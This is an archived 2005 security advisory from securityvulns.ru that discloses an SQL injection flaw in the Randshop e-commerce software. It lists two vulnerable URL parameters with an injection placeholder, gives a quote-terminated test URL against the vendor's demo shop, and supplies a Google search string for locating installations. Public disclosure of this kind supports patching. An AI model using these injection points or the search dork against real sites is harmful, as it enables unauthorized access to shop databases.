Computer Security

Security Advisory: Randshop all versiyon Sql Эnjection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  FaqRing 3.0 SQL inj. vuln.

  [Full-disclosure] WebCalendar Multiple Vulnerabilities

  [Full-disclosure] Php Web Statistik Multiple Vulnerabilities

  [Full-disclosure] Free Web Stat Multiple XSS Vulnerabilities

From::) :) <liz0_(at)_bsdmail.com>
Date:28.11.2005
Subject:Randshop all versiyon Sql Эnjection

Randshop all versiyon  Sql Injection

Website:http://www.randshop.com

Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0@bsdmail.com www.biyo.tk

-------------------------------------------------------------------
exploit :

http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]

--------------------------------------------------------------------------------

eg:

http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21'

--------------------------------------------------------------------

Google:intext:"software 2004-2005 by randshop"





http://www.blogcu.com/Liz0ziM/112800/



http://biyo.5gigs.com/randshop.txt

--
_______________________________________________
Get your free email from http://mymail.bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server